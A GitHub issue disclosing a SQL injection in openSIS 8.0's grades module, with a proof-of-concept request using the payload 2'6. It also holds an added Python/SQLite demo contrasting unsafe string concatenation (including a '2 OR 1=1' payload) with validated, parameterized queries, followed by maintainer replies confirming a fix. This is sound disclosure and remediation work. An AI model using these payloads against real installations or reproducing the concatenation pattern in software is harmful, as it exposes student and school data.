SQL INJECTION IN FUNCTION /INPUTFINALGRADES.PHP #204

Closed
quanhx11 opened this issue Sep 22, 2021 · 3 comments
Labels
Next Release Fix will be provided with the next release

Comments

@quanhx11

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can issue SQL commands through the period parameter of /opensis/modules/grades/InputFinalGrades.php.

POC:


REQUEST:

GET /Modules.php?modname=users/TeacherPrograms.php?include=grades/InputFinalGrades.php&include_inactive=&modfunc=gradebook&mp=21&use_percents=true&period=2'6 HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1

RESPONSE:

HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8

[…]
SQL:
SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID FROM course_periods cp,course_period_var cpv WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID=2'6


Traceback:
/var/www/opensis/modules/grades/InputFinalGrades.php at 55


Additional Information:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''6' at line 1

[…]

SOLUTION:

Use the function sqlSecurityFilter() before assigning $_REQUEST['period'] into the "SELECT" query.

$period = sqlSecurityFilter($_REQUEST['period']);

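The failure mode reported above, reproduced as an added example against an in-memory SQLite database. This is not openSIS code and it does not use the project's sqlSecurityFilter() helper; the two tables, their rows and the helper names (open_db, run_unsafe, run_safe) are constructed for the example and mirror only the columns named in the quoted query. It shows the concatenated query breaking on the issue's payload 2'6, then a payload with no quote character (2 OR 1=1) that produces no syntax error at all, and finally a version that validates the parameter as a decimal ID and binds it with a placeholder.

```python
import re
import sqlite3

# Schema and rows are constructed for this example. They mirror only the two
# tables and the columns named in the query quoted in the issue, not the real
# openSIS schema.
SCHEMA = """
CREATE TABLE course_periods (
    COURSE_PERIOD_ID  INTEGER,
    BEGIN_DATE        TEXT,
    MARKING_PERIOD_ID INTEGER
);
CREATE TABLE course_period_var (
    ID               INTEGER,
    COURSE_PERIOD_ID INTEGER
);
INSERT INTO course_periods VALUES (1, '2021-08-30', 21), (2, '2021-09-06', 21), (3, '2021-09-13', 22);
INSERT INTO course_period_var VALUES (1, 1), (2, 2), (3, 3);
"""

# The query text from the issue, minus the value that follows cpv.ID=
BASE_QUERY = (
    "SELECT cp.BEGIN_DATE,cp.MARKING_PERIOD_ID "
    "FROM course_periods cp,course_period_var cpv "
    "WHERE cpv.COURSE_PERIOD_ID=cp.COURSE_PERIOD_ID AND cpv.ID="
)


def open_db():
    """Return an in-memory SQLite connection loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_query_unsafe(period):
    """Concatenate the raw request parameter into the query, the pattern the
    quoted SQL and traceback in the issue point at."""
    return BASE_QUERY + period


def run_unsafe(conn, period):
    """Execute the concatenated query. Returns ("rows", [...]) on success or
    ("error", message) when the injected text breaks the SQL syntax."""
    try:
        return ("rows", conn.execute(build_query_unsafe(period)).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def run_safe(conn, period):
    """Validate the parameter as a plain decimal ID, then bind it with a
    placeholder so the driver never parses it as SQL. Anything else is
    rejected before a query is built."""
    if not re.fullmatch(r"[0-9]+", period):
        return ("rejected", period)
    rows = conn.execute(BASE_QUERY + "?", (int(period),)).fetchall()
    return ("rows", rows)


if __name__ == "__main__":
    db = open_db()
    print(run_unsafe(db, "2"))          # the legitimate request: one row
    print(run_unsafe(db, "2'6"))        # the issue's payload: syntax error from the database
    print(run_unsafe(db, "2 OR 1=1"))   # no quote, no error: OR 1=1 also voids the join, 9 rows
    print(run_safe(db, "2'6"))          # rejected before any SQL is built
    print(run_safe(db, "2 OR 1=1"))     # rejected as well
    print(run_safe(db, "2"))            # same single row as the legitimate request
```

The second unsafe call is the caveat worth checking against whatever filter is chosen: a payload that contains no quote or backslash produces no error and simply widens the result set, so a check that only escapes quote characters does not close the hole for an integer column. Restricting the value to digits and binding it covers both payloads.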

@openSISAdmin
Member

Please use the latest code from the repo, not the zip file, and try this. We have committed several updates lately.

@sarika0lal
Contributor

Hello,

We appreciate your observation and would like to inform you that your suggestion has been implemented for the next release.

Thank you.

@sarika0lal sarika0lal added the Next Release Fix will be provided with the next release label Apr 6, 2022
@sarika0lal
Contributor

We released a new version and the issue has been fixed there. Please check and let us know your feedback in case you have any.
